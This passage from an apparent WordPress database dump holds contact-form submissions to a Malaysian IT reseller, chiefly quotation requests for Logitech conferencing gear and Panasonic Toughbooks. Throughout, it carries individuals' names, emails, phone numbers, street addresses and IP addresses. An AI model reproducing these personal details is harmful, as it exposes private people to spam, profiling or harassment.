Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-13 14:01:33','175.139.198.217','1'),(103,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"Vincent\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"vincent@novate.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0376270066\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Novate Solutions\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:63:\"Logitech GROUP full set, do you also carry Brix GB-BRi5H-8250 ?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-14 07:13:19','42.191.21.252','1'),(104,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Claudius Nicholas\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"claudius.nicholas@ikea.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122794354\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Ikea Supply (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:119:\"Interested in provider for Logitech Meetup video conferencing solutions. Please contact me on how we can work together.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"08\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-14 09:37:56','202.95.123.194','1'),(105,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"so mei ching\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"mei.ching@xoritech.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"8776293\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"so mei ching\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"hi, i am looking for GK420t zebra label printer.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-14 12:52:36','61.6.233.189','1'),(106,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Tham kai long\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Mercteil@hotmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0179747347\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Mercteil auto sdn bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:56:\"7, jalan ss26/13, taman Anyang Jaya, 47301 petaling Jaya\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:128:\"TOUGHPAD FZ-Q2, TOUGHPAD FZ-X1, TOUGHPAD FZ-M1, TOUGHPAD FZ-G1, TOUGHPAD FZ-A2, TOUGHPAD FZ-B2, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:173:\"We are an automotive company looking for a Toughpad as our diagnosis tester. We are currently using cf19 but weâ€™d very much like to upgrade it as it is kinda bad and slow.\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-14 20:59:13','14.192.212.204','1'),(107,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Dominika Krolak\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"dkrolak@arcadiasoft.pl\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"426891113\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"ArCADiasoft\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:1482:\"Dear Sirs, I have been visiting your website and checking available software in your portfolio. I believe I have an interesting offer for Bintara Solutions company. We are the largest Polish manufacturer of software for the construction industry, operating since 1997. We develop specialist software for architects, construction engineers as well as sanitary and electrical system designers. Our flagship product is the ArCADia BIM system which enables the creation of comprehensive, interdisciplinary designs of buildings and offers analysis of collisions among structural elements and installations. ArCADia software can work as a standalone application or as the AutoCAD overlay. We can boast of over 100,000 users worldwide and our programs have received numerous awards. We offer technologically advanced applications at attractive prices, which has enabled us to attract many users. The sale of our software is based on a network of independent distributors, whose commercial success is very important to us. For this reason, apart from technical support, our Partners are also offered very attractive discounts and we require no minimum sales quotas. Offering the possibility to expand your portfolio we would welcome your company to become one of our Partners. We encourage you to visit our website www.arcadiasoft.eu; I look forward to hearing from you soon. Yours faithfully, Dominika Krolak ArCADiasoft on YouTube: https://www.youtube.com/channel/UCqUQ7j4AWqW7c934IDkty6g\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-14 22:53:14','188.95.26.251','1'),(108,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Strawberry Oh\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"strawberry.oh@jatitinggi.biz\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0104640051\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"JT Benchmark Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:92:\"NO 23 &amp; 25, JALAN TEMENGGUNG 3/9, BANDAR MAHKOTA CHERAS, SEK. 9, 43200 Cheras, Selangor.\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 20\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"89\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-15 16:37:20','124.13.236.155','1'),(109,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Strawberry Oh\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"strawberry.oh@jatitinggi.biz\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0104640051\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"JT Benchmark Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Panasonic toughbook or Getac fully rugged notebook\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"89\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-15 16:39:06','124.13.236.155','1'),(110,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Tajul Ariffin bin Hasan\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"tajul.innotech@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192400215\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"GeneFlux Biosciences Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:103:\"Suite G-1 &amp; G- 2, Pusat Perdagangan KLH,, Menara KLH, Bandar Puchong Jaya,, 47100 Puchong, 